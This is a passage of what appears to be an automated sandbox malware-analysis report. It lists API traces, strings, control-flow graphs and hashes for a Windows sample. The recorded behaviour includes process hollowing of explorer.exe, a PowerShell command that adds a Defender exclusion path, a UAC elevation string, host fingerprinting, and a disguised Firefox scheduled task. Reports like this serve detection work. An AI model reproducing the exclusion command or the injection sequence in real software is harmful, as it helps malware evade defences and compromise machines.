                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD7BF8
                    • HeapFree.KERNEL32(00000000), ref: 00BD7BFB
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD7C04
                    • HeapFree.KERNEL32(00000000), ref: 00BD7C07
                    Strings
                    • %s|%d.%d (%d)|%s|%s|%S, xrefs: 00BD7B7B
                    • %d|%s|%.16s|, xrefs: 00BD7B50
                    • 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00BD7AE2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$Free$ByteCharMultiWide$Alloc$NamePolicywsprintf$CloseComputerInformationMemoryOpenQueryUser
                    • String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%s|%s|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
                    • API String ID: 4008773985-1210213088
                    • Opcode ID: 3327f1b8206c54506c26cf191ed7964985b85114d761a38c4736159f428815f6
                    • Instruction ID: beb0238706329931498992546fd7dd965b30e66ebe9052125aeae1506d197699
                    • Opcode Fuzzy Hash: 3327f1b8206c54506c26cf191ed7964985b85114d761a38c4736159f428815f6
                    • Instruction Fuzzy Hash: C8919C71A44309AEEB209BA58C55FEEFBB9EF44700F1540A7EA14E7290FF709941CB60

                    Control-flow Graph

                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtQueryInformationProcess,76CF0EE0,?), ref: 00BD94BC
                    • GetProcAddress.KERNEL32(00000000), ref: 00BD94C5
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlEnterCriticalSection), ref: 00BD94D4
                    • GetProcAddress.KERNEL32(00000000), ref: 00BD94D7
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlLeaveCriticalSection), ref: 00BD94E6
                    • GetProcAddress.KERNEL32(00000000), ref: 00BD94E9
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString), ref: 00BD94F8
                    • GetProcAddress.KERNEL32(00000000), ref: 00BD94FB
                    • GetCurrentProcessId.KERNEL32 ref: 00BD9529
                    • OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 00BD9537
                    • ReadProcessMemory.KERNEL32(00000000,?,00BD7434,00000004,00000000), ref: 00BD9568
                    • ReadProcessMemory.KERNEL32(00000000,00BD7428,?,00000004,00000000), ref: 00BD9582
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00BD9598
                    • StrNCatW.SHLWAPI(?,\explorer.exe,00000105), ref: 00BD95AF
                    • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 00BD95C3
                    • lstrcpyW.KERNEL32(00000000,?), ref: 00BD95D4
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00BD9611
                    • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 00BD963D
                    • ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000), ref: 00BD965C
                    • CloseHandle.KERNEL32(00000000), ref: 00BD969F
                    • StrCmpIW.SHLWAPI(?,?), ref: 00BD96B3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$HandleModule$AddressMemoryProcRead$AllocCloseCurrentDirectoryFileNameOpenVirtualWindowslstrcpy
                    • String ID: NtQueryInformationProcess$RtlEnterCriticalSection$RtlInitUnicodeString$RtlLeaveCriticalSection$\explorer.exe$explorer.exe$ntdll.dll
                    • API String ID: 2609293587-3346233597
                    • Opcode ID: c019915840889e83c9f2d7ae0e81dcd733d0adef450ffaf947a532714a7040bd
                    • Instruction ID: 93d517ba473a540545f667ab406d52446f54e0fe7ab369d3a684d4304a85e471
                    • Opcode Fuzzy Hash: c019915840889e83c9f2d7ae0e81dcd733d0adef450ffaf947a532714a7040bd
                    • Instruction Fuzzy Hash: 11614F75A40209ABDB10DBA4CC49F9EFBB8EF48710F110596F614E72A4EB74EA41CF64

                    Control-flow Graph

                    APIs
                    • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104,?,?,?,00BD92D8), ref: 00BD7306
                    • ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,?,?,?,00BD92D8), ref: 00BD7319
                    • lstrlenW.KERNEL32(?,?,?,?,00BD92D8), ref: 00BD7322
                    • ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104,?,?,?,00BD92D8), ref: 00BD733D
                    • GetSystemWow64DirectoryW.KERNEL32(?,00000104,?,?,?,00BD92D8), ref: 00BD734B
                    • GetLastError.KERNEL32(?,?,?,00BD92D8), ref: 00BD7355
                    • wnsprintfW.SHLWAPI ref: 00BD7377
                    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00BD738F
                    • wnsprintfW.SHLWAPI ref: 00BD73A9
                    • SetFileAttributesW.KERNEL32(?,00000006), ref: 00BD73C5
                    • lstrcpyW.KERNEL32(?,/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"), ref: 00BD73D7
                    • GetUserNameW.ADVAPI32(?,?), ref: 00BD73F6
                    • NetUserGetInfo.NETAPI32(00000000,?,00000001,00000000), ref: 00BD740B
                    • NetApiBufferFree.NETAPI32(00000000), ref: 00BD7420
                    • CoInitializeEx.OLE32(00000000,?), ref: 00BD7437
                    • lstrlenW.KERNEL32({3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 00BD7451
                    • wsprintfW.USER32 ref: 00BD748E
                    • CoGetObject.OLE32(?,?,00BD2530,00000000), ref: 00BD74AB
                    • CoUninitialize.OLE32 ref: 00BD74EB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentExpandStrings$Userlstrlenwnsprintf$AttributesBufferDirectoryErrorFileFreeInfoInitializeLastNameObjectSystemUninitializeWow64lstrcpywsprintf
                    • String ID: "%s"$$$%%ProgramData%%\r%Sr.js$%ComSpec%$%ProgramFiles%$%ProgramW6432%$/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"$Elevation:Administrator!new:%s${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • API String ID: 3941589607-3081872691
                    • Opcode ID: 6724e0b31b8f6d61e6e42771fc87c6c06ab73a68e16e86e0615cd6320e661db1
                    • Instruction ID: 74f867b2db748e75f443496cadd2c7930908fc8c0ae7ae9f5119a493ea89c961
                    • Opcode Fuzzy Hash: 6724e0b31b8f6d61e6e42771fc87c6c06ab73a68e16e86e0615cd6320e661db1
                    • Instruction Fuzzy Hash: A0512CB2941218ABDB20DB94DC59FDEF7BCEB44715F010496E609E7250FBB49A84CFA0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 660 bd5c70-bd5c83 661 bd5fbe-bd5fc6 660->661 662 bd5c89-bd5caa GetModuleHandleW GetProcAddress 660->662 662->661 663 bd5cb0-bd5cc1 662->663 663->661 664 bd5cc7-bd5cce 663->664 665 bd5cd7-bd5cda 664->665 666 bd5cd0-bd5cd5 664->666 665->661 668 bd5ce0 665->668 667 bd5ce5 666->667 669 bd5ce7-bd5cf0 667->669 668->667 669->669 670 bd5cf2 669->670 671 bd5cf4-bd5d00 670->671 671->671 672 bd5d02-bd5d08 671->672 673 bd5d10-bd5d1e 672->673 673->673 674 bd5d20 673->674 675 bd5d22-bd5d2b 674->675 675->675 676 bd5d2d-bd5d65 CreateProcessW 675->676 677 bd5d6b-bd5dac NtQueryInformationProcess ReadProcessMemory GetThreadContext 676->677 678 bd5fb5-bd5fbd 676->678 679 bd5fa5-bd5fb3 CloseHandle * 2 677->679 680 bd5db2-bd5dbf 677->680 679->678 680->679 682 bd5dc5-bd5e14 VirtualAllocEx WriteProcessMemory 680->682 683 bd5e4c-bd5e50 682->683 684 bd5e16-bd5e27 682->684 685 bd5f66-bd5f9f WriteProcessMemory SetThreadContext ResumeThread 683->685 686 bd5e56-bd5e60 683->686 687 bd5e3d-bd5e48 684->687 688 bd5e29-bd5e3b WriteProcessMemory 684->688 685->679 686->685 689 bd5e66-bd5e69 686->689 687->684 690 bd5e4a 687->690 688->687 691 bd5e70 689->691 690->683 692 bd5e72-bd5e7a 691->692 692->692 693 bd5e7c-bd5e8f 692->693 694 bd5e91-bd5e96 693->694 695 bd5eb0-bd5ebd 693->695 696 bd5e98-bd5ea3 694->696 697 bd5f4c-bd5f5a 695->697 698 bd5ec3-bd5ec9 695->698 696->697 700 bd5ea9-bd5eab 696->700 697->691 699 bd5f60 697->699 701 bd5ed0-bd5ee5 698->701 699->685 700->696 702 bd5ead 700->702 703 bd5f47-bd5f4a 701->703 704 bd5ee7-bd5efb 701->704 702->695 703->697 703->701 705 bd5efd-bd5f3c ReadProcessMemory WriteProcessMemory 704->705 706 bd5f3f-bd5f45 704->706 705->706 706->703 706->704
                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 00BD5C93
                    • GetProcAddress.KERNEL32(00000000), ref: 00BD5C9A
                    • CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 00BD5D5D
                    • NtQueryInformationProcess.NTDLL ref: 00BD5D7A
                    • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 00BD5D94
                    • GetThreadContext.KERNEL32(?,00010007), ref: 00BD5DA4
                    • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 00BD5DD8
                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00BD5E02
                    • WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 00BD5E3B
                    • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 00BD5F1B
                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 00BD5F33
                    • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 00BD5F7B
                    • SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 00BD5F96
                    • ResumeThread.KERNEL32(?,?,?,00000000), ref: 00BD5F9F
                    • CloseHandle.KERNEL32(?), ref: 00BD5FAE
                    • CloseHandle.KERNEL32(00000000), ref: 00BD5FB3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
                    • String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
                    • API String ID: 918112823-4001407722
                    • Opcode ID: 83519d47db83f6c5bf0d760d757945b3a19bbd6a68c25501490df7259e0dd4b8
                    • Instruction ID: b5fecf24fd49fa9409fa449e1459b7d681c4199d0e9af7e31a5697498f2a1dee
                    • Opcode Fuzzy Hash: 83519d47db83f6c5bf0d760d757945b3a19bbd6a68c25501490df7259e0dd4b8
                    • Instruction Fuzzy Hash: 32B13D71A01219EFDF24CF98DC84BADFBF5FB48304F1440AAE909AB291E73599458B54

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 707 bd86e6-bd86f4 708 bd867c-bd8699 707->708 709 bd86f6-bd87f9 InitializeCriticalSection call bd71a0 GetVolumeInformationW StringFromGUID2 wsprintfA CreateMutexW GetLastError 707->709 711 bd86be-bd86db call bd5780 Sleep 708->711 712 bd869b 708->712 717 bd87ff-bd884d call bd26b0 WSAStartup CryptAcquireContextA 709->717 718 bd88f1-bd88f3 ExitProcess 709->718 722 bd8178-bd8199 call bd6830 711->722 715 bd869d-bd869f 712->715 716 bd86a1-bd86bb call bd2820 call bd76f0 712->716 715->711 715->716 716->711 728 bd886f 717->728 729 bd884f-bd8869 CryptAcquireContextA 717->729 731 bd81ad-bd81bb lstrcmpA 722->731 732 bd819b-bd81ab Sleep 722->732 733 bd8871-bd887f 728->733 729->718 729->728 734 bd81bd-bd81cc call bd93a0 call bd5780 731->734 735 bd81ce-bd81f8 call bd65e0 * 2 call bd63f0 731->735 732->722 733->733 736 bd8881-bd8885 733->736 734->722 750 bd81fe-bd8200 735->750 751 bd867b-bd8699 GetTickCount64 735->751 739 bd8887 736->739 740 bd88a1-bd88f0 CoInitializeEx ExpandEnvironmentStringsW CreateFileW 736->740 743 bd8890-bd889f 739->743 743->740 743->743 750->751 752 bd8206-bd820c 750->752 751->711 751->712 752->751 753 bd8212-bd8285 call bd57a0 call bd7710 call bd2680 call bd5760 call bd57a0 call bd65e0 call bd2820 call bd76f0 StrToIntA 752->753 770 bd828b 753->770 771 bd8671-bd8679 call bd5780 753->771 772 bd8653-bd865a call bd6370 770->772 773 bd8292-bd82a6 call bd65e0 * 2 770->773 771->711 772->771 780 bd865c-bd866b InitiateSystemShutdownExW 772->780 773->771 783 bd82ac-bd82ae 773->783 780->771 783->771 784 bd82b4-bd82dd StrToIntA call bd63f0 call bd5760 783->784 784->771 789 bd82e3-bd82e9 784->789 790 bd832f-bd8332 789->790 791 bd82eb-bd832d GetSystemDirectoryW PathCombineW wnsprintfW 789->791 792 bd8384-bd83cb GetModuleHandleA GetProcAddress * 2 790->792 793 bd8334-bd834d call bd63f0 call bd2960 790->793 791->792 795 bd83cd-bd83d0 792->795 796 bd83d3-bd83d7 792->796 793->792 805 bd834f-bd837f ExpandEnvironmentStringsW wnsprintfW call bd5780 793->805 795->796 798 bd83d9-bd83ee call bd5850 796->798 799 bd8411-bd8435 LoadLibraryA GetProcAddress 796->799 803 bd8439-bd843e 798->803 808 bd83f0-bd840f call bd63f0 call bd2850 call bd5780 798->808 799->803 806 bd8445-bd8457 call bd5760 803->806 807 bd8440 803->807 805->792 815 bd845d-bd84e2 call bd9340 call bd7710 wsprintfA wnsprintfA call bd2680 call bd6830 806->815 816 bd84f8-bd850f call bd5780 * 3 806->816 807->806 808->803 834 bd84eb-bd84f5 call bd5780 815->834 835 bd84e4-bd84e6 call bd5780 815->835 816->711 834->816 835->834
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00BD81A6
                    • Sleep.KERNEL32(00000000), ref: 00BD86D6
                    • InitializeCriticalSection.KERNEL32(00BDA090), ref: 00BD8732
                      • Part of subcall function 00BD71A0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00BD71CA
                      • Part of subcall function 00BD71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00BD71E6
                      • Part of subcall function 00BD71A0: GetProcessHeap.KERNEL32(00000008,?), ref: 00BD71F9
                      • Part of subcall function 00BD71A0: HeapAlloc.KERNEL32(00000000), ref: 00BD7200
                      • Part of subcall function 00BD71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00BD721D
                      • Part of subcall function 00BD71A0: RegCloseKey.ADVAPI32(80000002), ref: 00BD7229
                    • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD875F
                    • StringFromGUID2.OLE32(?,?,00000080), ref: 00BD87B8
                    • wsprintfA.USER32 ref: 00BD87CF
                    • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00BD87E3
                    • GetLastError.KERNEL32 ref: 00BD87EE
                    • ExitProcess.KERNEL32 ref: 00BD88F3
                      • Part of subcall function 00BD26B0: GetTickCount.KERNEL32 ref: 00BD26B2
                    • WSAStartup.WS2_32(00000202,?), ref: 00BD882C
                    • CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00BD8845
                    • CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00BD8861
                    • CoInitializeEx.OLE32(00000000,00000000), ref: 00BD88AC
                    • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 00BD88C3
                    • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 00BD88E2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: AcquireContextCreateCryptHeapInitializeProcessQuerySleepValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
                    • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
                    • API String ID: 2776981366-2941900213
                    • Opcode ID: 2e9ba3753abc1f0d331828f60eaf7813803318aa1c728f03cde48cb3674e1808
                    • Instruction ID: d25f2be12285ac4a870932c913024ffd8693eeec291e8785f23c4e12288ad211
                    • Opcode Fuzzy Hash: 2e9ba3753abc1f0d331828f60eaf7813803318aa1c728f03cde48cb3674e1808
                    • Instruction Fuzzy Hash: C061C271A41348EBDB10DBA4DC55FADFBB8AF04701F1040ABE505E7291FFB09A448B55
                    APIs
                    • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 00BD7C7A
                    • wnsprintfA.SHLWAPI ref: 00BD7D12
                    • wsprintfA.USER32 ref: 00BD7D39
                    • lstrcmpA.KERNEL32(?,Start), ref: 00BD7FBB
                    • EnterCriticalSection.KERNEL32(00BDA090), ref: 00BD8011
                    • GetProcessHeap.KERNEL32(00000008,?), ref: 00BD8078
                    • HeapAlloc.KERNEL32(00000000), ref: 00BD807F
                    • GetProcessHeap.KERNEL32(00000008,?,?), ref: 00BD808A
                    • HeapReAlloc.KERNEL32(00000000), ref: 00BD8091
                    • LeaveCriticalSection.KERNEL32(00BDA090), ref: 00BD80E8
                      • Part of subcall function 00BD5FD0: GetModuleHandleW.KERNEL32(ntdll), ref: 00BD5FED
                      • Part of subcall function 00BD5FD0: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 00BD6001
                      • Part of subcall function 00BD5FD0: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 00BD600C
                      • Part of subcall function 00BD5FD0: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 00BD6017
                      • Part of subcall function 00BD5FD0: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 00BD6022
                      • Part of subcall function 00BD5FD0: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00BD602D
                      • Part of subcall function 00BD5FD0: GetTempPathW.KERNEL32(000000F6,?), ref: 00BD6046
                      • Part of subcall function 00BD5FD0: wnsprintfW.SHLWAPI ref: 00BD6081
                      • Part of subcall function 00BD5FD0: PathCombineW.SHLWAPI(?,?,?), ref: 00BD609B
                      • Part of subcall function 00BD5FD0: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 00BD60C2
                      • Part of subcall function 00BD5FD0: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00BD60E6
                      • Part of subcall function 00BD5FD0: SetEndOfFile.KERNEL32(00000000), ref: 00BD60E9
                      • Part of subcall function 00BD5FD0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD60F6
                      • Part of subcall function 00BD5FD0: wnsprintfW.SHLWAPI ref: 00BD6114
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD8107
                    • HeapFree.KERNEL32(00000000), ref: 00BD810E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
                    • String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
                    • API String ID: 851647271-3778496198
                    • Opcode ID: 9c761b5bfe46d0aaffd97ca6cd29d45ce79d35de1186d4c9e173fb0e045b85f5
                    • Instruction ID: 393e35133cf271ecfa81f940305a3aa2e43df0d7f354eb6654472db10a7bc5a3
                    • Opcode Fuzzy Hash: 9c761b5bfe46d0aaffd97ca6cd29d45ce79d35de1186d4c9e173fb0e045b85f5
                    • Instruction Fuzzy Hash: 42E1F171A492569FDB298B288890BBAFBE6FF85301F1940EBD84697351FF308C46C750
                    APIs
                    • InitializeCriticalSection.KERNEL32(00BDA090), ref: 00BD8732
                      • Part of subcall function 00BD71A0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00BD71CA
                      • Part of subcall function 00BD71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00BD71E6
                      • Part of subcall function 00BD71A0: GetProcessHeap.KERNEL32(00000008,?), ref: 00BD71F9
                      • Part of subcall function 00BD71A0: HeapAlloc.KERNEL32(00000000), ref: 00BD7200
                      • Part of subcall function 00BD71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00BD721D
                      • Part of subcall function 00BD71A0: RegCloseKey.ADVAPI32(80000002), ref: 00BD7229
                    • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD875F
                    • StringFromGUID2.OLE32(?,?,00000080), ref: 00BD87B8
                    • wsprintfA.USER32 ref: 00BD87CF
                    • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00BD87E3
                    • GetLastError.KERNEL32 ref: 00BD87EE
                    • ExitProcess.KERNEL32 ref: 00BD88F3
                      • Part of subcall function 00BD26B0: GetTickCount.KERNEL32 ref: 00BD26B2
                    • WSAStartup.WS2_32(00000202,?), ref: 00BD882C
                    • CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00BD8845
                    • CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00BD8861
                    • CoInitializeEx.OLE32(00000000,00000000), ref: 00BD88AC
                    • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 00BD88C3
                    • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 00BD88E2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
                    • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
                    • API String ID: 267019445-2941900213
                    • Opcode ID: 46cde534e7c9676be72e6822b46845f2cb169df6cb229f75f6e9d86dc39beee1
                    • Instruction ID: ca0ccad8ddb050859f07c0b99f5968ca64b266975f613fbc8309ca83faaf1923
                    • Opcode Fuzzy Hash: 46cde534e7c9676be72e6822b46845f2cb169df6cb229f75f6e9d86dc39beee1
                    • Instruction Fuzzy Hash: C441A474A41308EAE710DBA4DD1AF99F7B8EB04705F1080A7F205EB2E1FFB096448B55
                    APIs
                    • CryptGenRandom.ADVAPI32(00000020,?), ref: 00BD93B8
                      • Part of subcall function 00BD2850: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,00BD9405,00000000), ref: 00BD2872
                      • Part of subcall function 00BD2850: HeapAlloc.KERNEL32(00000000,?,?,?,?,00BD9405,00000000), ref: 00BD2879
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9415
                    • HeapFree.KERNEL32(00000000), ref: 00BD941C
                    • wsprintfA.USER32 ref: 00BD944F
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9488
                    • HeapFree.KERNEL32(00000000), ref: 00BD948B
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9490
                    • HeapFree.KERNEL32(00000000), ref: 00BD9493
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$Free$AllocCryptRandomwsprintf
                    • String ID: %d|%s|%s|%s$45LkAGkF
                    • API String ID: 4113358155-2124572182
                    • Opcode ID: f1c3a8e2b23f42337c2e79049f0c7383857b08207e3dde7db5f248427f72872c
                    • Instruction ID: 2ab20eeeee7643013383cfb571322f4e235ace75d11e1ca738869d2c5b1882bb
                    • Opcode Fuzzy Hash: f1c3a8e2b23f42337c2e79049f0c7383857b08207e3dde7db5f248427f72872c
                    • Instruction Fuzzy Hash: FD2108719003486BEB10A7909C16FDFFBADDF44714F0401A2FA08A73D2FA619905C7A6
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00BD6C77
                    • CoCreateInstance.OLE32(00BD1020,00000000,00000001,00BD1000,?), ref: 00BD6C94
                    • SysAllocString.OLEAUT32(\Mozilla), ref: 00BD6CD4
                    • SysFreeString.OLEAUT32(?), ref: 00BD6D0B
                    • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 00BD6D18
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD6D2F
                    Strings
                    • \Mozilla, xrefs: 00BD6CCF
                    • Firefox Default Browser Agent 318146B0AF4A39CB, xrefs: 00BD6D13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: String$AllocFree$CreateInitInstanceVariant
                    • String ID: Firefox Default Browser Agent 318146B0AF4A39CB$\Mozilla
                    • API String ID: 478541636-3211539605
                    • Opcode ID: 65e05220bc180b4671c9d9a46469631164c1289e0fffdf3fae8b2d83d2a62b44
